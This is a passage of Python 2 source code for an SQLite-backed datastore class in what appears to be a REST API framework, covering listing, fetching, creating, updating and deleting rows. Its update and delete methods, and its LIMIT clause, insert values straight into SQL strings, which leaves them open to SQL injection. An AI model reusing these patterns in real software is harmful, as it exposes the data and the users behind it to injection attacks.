if len(where_query) > 0:
data["query"] += " WHERE "
data["query"] += " AND ".join(where_query)
cursor = self.get_connector().cursor()
# a hook for ordering
data["query"] += " ORDER BY id ASC"
if limit:
data["query"] += " LIMIT {0}".format(limit)
cursor.execute(data["query"].format(self.ressource_config['table']),
tuple(args)
)
objs = []
for elem in cursor.fetchall():
objs.append(dict(zip(self.fields, elem)))
return objs
def get_fields(self, **fields):
if self.partial:
fields, kwargs = self.partial.get_partials(**fields)
if not fields:
fields = self.model.get_fields_name()
for field in fields:
if field not in self.model.get_fields_name():
raise BadRequest()
if self.model.pk_field.name not in fields:
fields.append(self.model.pk_field.name)
else:
fields = self.model.get_fields_name()
return fields
def get_list(self, **kwargs):
"""
return all the objects, paginated if needed, fitered if
filters have been set.
"""
self.fields = self.get_fields(**kwargs)
fields = ", ".join(self.fields)
kwargs["query"] = 'SELECT {0}'.format(fields)
start = kwargs.pop("offset", None)
end = kwargs.pop("count", None)
data = self.filter(**kwargs)
return self.paginate(data, start=start, end=end)
def get(self, identifier):
"""
Return a single row or raise NotFound
"""
fields = ",".join(self.model.get_fields_name())
query = "select {0} from {1} where {2}=?".format(
fields,
self.ressource_config["table"],
self.model.pk_field.name)
cursor = self.get_connector().cursor()
cursor.execute(query, (identifier,))
obj = cursor.fetchone()
if obj:
fields = self.model.get_fields_name()
return dict(zip(fields, obj))
else:
raise NotFound
def create(self, data):
"""
Validate the data with :meth:`.base.DataStore.validate`
And, if data is valid, create the row in database and return it.
"""
self.validate(data)
fields = []
values = []
for k, v in data.iteritems():
if k in self.model.get_fields_name():
fields.append(str(k))
values.append(unicode(v))
conn = self.conn
cursor = conn.cursor()
query = "insert into {0} {1} values ({2})".format(
self.ressource_config["table"],
tuple(fields),
",".join(["?" for step in range(len(fields))])
)
cursor.execute(query, tuple(values))
self.conn.commit()
return cursor.lastrowid
def update(self, obj, data):
"""
Retreive the object to be updated
(:meth:`~.SQLiteDataStore.get` will raise a NotFound error if the row
does not exist)
Validate the fields to be updated and return the updated row
"""
self.get(obj[self.model.pk_field.name])
self.validate_fields(data)
fields = []
values = []
for k, v in data.iteritems():
if k in self.model.get_fields_name():
fields.append(k)
values.append(v)
conn = self.conn
cursor = conn.cursor()
update = " ,".join(["{0}='{1}'".format(f, v) for f, v in zip(fields,
values)])
query = "update {0} set {1} WHERE {2}={3}".format(
self.ressource_config["table"],
update,
self.model.pk_field.name,
obj[self.model.pk_field.name]
)
cursor.execute(query)
conn.commit()
return self.get(obj[self.model.pk_field.name])
def delete(self, identifier):
"""
Retreive the object to be updated
(:meth:`~.SQLiteDataStore.get` will raise a NotFound error if
the row does not exist)
Return None on success, Raise a 400 error if foreign key
constrain prevent delete.
"""
self.get(identifier)
conn = self.conn
cursor = conn.cursor()
query = "delete from {0} where {2}={1}".format(
self.ressource_config["table"],
identifier,
self.model.pk_field.name)
try:
cursor.execute(query)
except sqlite3.IntegrityError, e:
message = ""
if "foreign" in e.message:
message = """another ressource depends on this
object. Cloud not delete before all ressources
depending on it are also deleted"""
raise BadRequest(message)
conn.commit()
def __del__(self):
self.conn.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.